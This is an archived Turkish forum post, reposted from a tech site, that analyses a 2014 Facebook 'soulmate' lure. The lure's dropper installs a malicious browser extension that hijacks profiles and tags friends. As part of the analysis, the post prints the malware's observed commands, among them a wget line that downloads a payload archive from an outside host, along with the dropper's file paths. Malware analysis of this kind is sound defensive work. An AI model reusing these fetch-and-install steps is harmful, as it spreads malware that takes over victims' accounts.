PDA

Orijinalini görmek için tıklayınız : Facebook Virüsü Nasıl Temizlenir?WeBMasteR
06.Nisan.2014, 22:26
Facebook Virüsleri Nasıl Temizlenir?


Arkadaşınızın veya sizin de başınıza gelmiş olabilir. Sanki ilginç bir video çekimi yapmış da yayınlıyormuşsunuz gibi gösterilen ve sizin hiç haberiniz olmadığı bir sorun başbelası oldu. Bu virüs oldukça iyi yayılmış. Virüsün yaptığı iş çok basit. Tarayıcınıza kendini eklenti olarak ekliyor ve sonucunda sizin Facebook profilinizi yayılmak ve çeşitli amaçlar (beğeni vs..) için kullanıyor. Bu virüsü bulmam ise son günlerde bazı arkadaşlarımın beni yorumlarda taglediğini fark etmem ile oldu. Resimde görüleceği üzere bir arkadaşım yorumda benden bahsetmiş. https://www.teknolojioku.com/application/static/data/news/1/1387217506_1.png
Tıkladığımda ” Facebook’taki ruh ikizini bul” gibi bir gönderiye yönlendiriyor. Gönderide bu kesinlikle çalışıyor gibi ibare ve bir link mevcut.
https://www.teknolojioku.com/application/static/data/news/1/1387217527_2.png
Yorumda görüldüğü üzere kurbanlar bilinçleri dışında arkadaş listelerindeki tüm arkadaşlarını virüs sayesinde burada etiketliyor. Sonuç olarak arkadaşları buraya gelip linke tıkladıklarında resimdeki siteye yönlendiriyor.
https://www.teknolojioku.com/application/static/data/news/1/1387217550_3.png
Ortada kıytırıktan bir süreç çalışıyor. Sürecin sonunda ne mi oluyor dersiniz? Tabi ki sözde ruh ikizinizi görmeniz için virüsünü indirmenizi istiyor.
https://www.teknolojioku.com/application/static/data/news/1/1387217600_4.png
Aslında istemiyor da, alttaki resimde görüldüğü gibi çoğu tarayıcıda mousenizi hareket ettirince otomatik olarak indiriyor. Resimdeki yorumlar sizi kandırmasın. Bu sayfa yine resimde göreceğiniz gibi HTTRACK kullanarak bir siteden kopyalanmış. Bu yorumların hepsi aynı sürekli rastgele değişiyor.
https://www.teknolojioku.com/application/static/data/news/1/1387217643_6.png
Evet dosyamızı indirdim.
https://www.teknolojioku.com/application/static/data/news/1/1387217671_5.png
Anubis’i kullanarak biraz inceleyelim. Alttaki resimde göreceğiniz üzere program paketlenmiş bir virüs. İçerisinde kendisi hariç 3 program daha bulunduruyor. Siz çalıştırdığınız zaman bu programları arşiv mantığıyla arşivden çıkarıyor ve ” install_browser.exe ” programını bilgisayarınızın başlangıcına ekliyor ve çalıştırıyor. Bunun haricinde kendisi işe yaramaz. Tarihten örnek vermek gerekirse Truva Atı mantığıyla çalışıyor. Bunu çalıştırdığınızda içindeki asıl iş yapacak programları ortaya çıkarıyor.
https://www.teknolojioku.com/application/static/data/news/1/1387217699_7.png
“C:\​Documents and Settings\​Administrator\​Application Data\​install_browser.exe”
Gelelim “install_browser.exe“ programına, bu program sisteminizde aşağıdaki dizinleri oluşturuyor.
C:\Fei
C:\Fei\50470
Ardından işe koyuluyor :). Diğer programları (“wget.exe” ve “unzip.exe“) çalıştırıyor. Bu programlar aşağıdaki işlemleri gerçekleştiriyor.
C:\Documents and Settings\Administrator\Application Data\wget.exe
wget.exe -O “C:\Fei\50470\crx.zip” “404 Not Found (https://bekiruser.com/a***s****.zip”)
C:\Documents and Settings\Administrator\Application Data\install_browser.exe
“C:\Documents and Settings\Administrator\Application Data\install_browser.exe” /restart
C:\Documents and Settings\Administrator\Application Data\unzip.exe
unzip.exe -n “C:\Fei\50470\crx.zip” -d “C:\Fei\50470″
Sırayla açıklayayım. İlk olarak “wget.exe” çalışıyor. Bu program sayesinde ikinci satırda bulunan siteden bir arşiv dosyası indiriyor ve adını “crx.zip” olarak değiştiriyor. *** Koymamın sebebi küfür içermesi :)).
Son olarak “install_browser.exe” tekrar çalışıp “crx.zip” içindeki eklenti dosyalarını tarayıcınıza ekliyor ve Facebook’unuzu kullanarak kendini yayıyor :).
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\ChromePref.txt
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\OperaPref.txt
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\YandexPref.txt
Bu virüs antivirüslere yakalanıyor. Size bulaşmaması için ise yapacağınız tek şey; bu tür saçmalıklara inanmamak ve güncel bir antivirüs bulundurmak.

Kaynak: Facebook vir (https://www.teknolojioku.com/haber/facebook-virusu-nasil-temizlenir-15585.html)